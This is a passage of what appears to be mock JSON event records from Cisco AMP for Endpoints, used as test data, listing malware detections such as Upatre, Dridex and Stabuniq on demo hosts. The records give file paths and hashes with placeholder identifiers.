malware","event_type_id":1107296272,"detection":"Win.Trojan.Upatre.tht.VRT","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704819,"start_date":"2021-01-15T10:00:19+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331413502427000,"timestamp":1610704818,"timestamp_nanoseconds":57000000,"date":"2021-01-15T10:00:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331409207459841","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614973673406000,"timestamp":1610704817,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:17+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1185,"scanned_processes":22,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207810561442000,"timestamp":1610704814,"timestamp_nanoseconds":961000000,"date":"2021-01-15T10:00:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207810561441801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207806266474000,"timestamp":1610704813,"timestamp_nanoseconds":963000000,"date":"2021-01-15T10:00:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207806266474504","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.cab","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\4543543.cab","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":777000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507207","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":179000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984840","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":2692,"disposition":"Malicious","file_name":"jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":148000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984839","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984838","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984837","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":7000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017540","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659217662018000,"timestamp":1610704809,"timestamp_nanoseconds":867000000,"date":"2021-01-15T10:00:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017539","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899966001000,"timestamp":1610704801,"timestamp_nanoseconds":966000000,"date":"2021-01-15T10:00:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:N.18fd.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704801,"start_date":"2021-01-15T10:00:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a"},"parent":{"disposition":"Clean","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395844000300,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Stabuniq.15nx.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704800,"start_date":"2021-01-15T10:00:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207750431900000,"timestamp":1610704800,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207750431899653","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":445000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":414000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":3276,"disposition":"Malicious","file_name":"stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254540350751000,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254540350750721","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159246968074797000,"timestamp":1610704800,"timestamp_nanoseconds":355000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159246968074797057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3372C1EDAB46837F1E973164FA2D72","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\3372C1EDAB46837F1E973164FA2D72","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663665717641000,"timestamp":1610704800,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 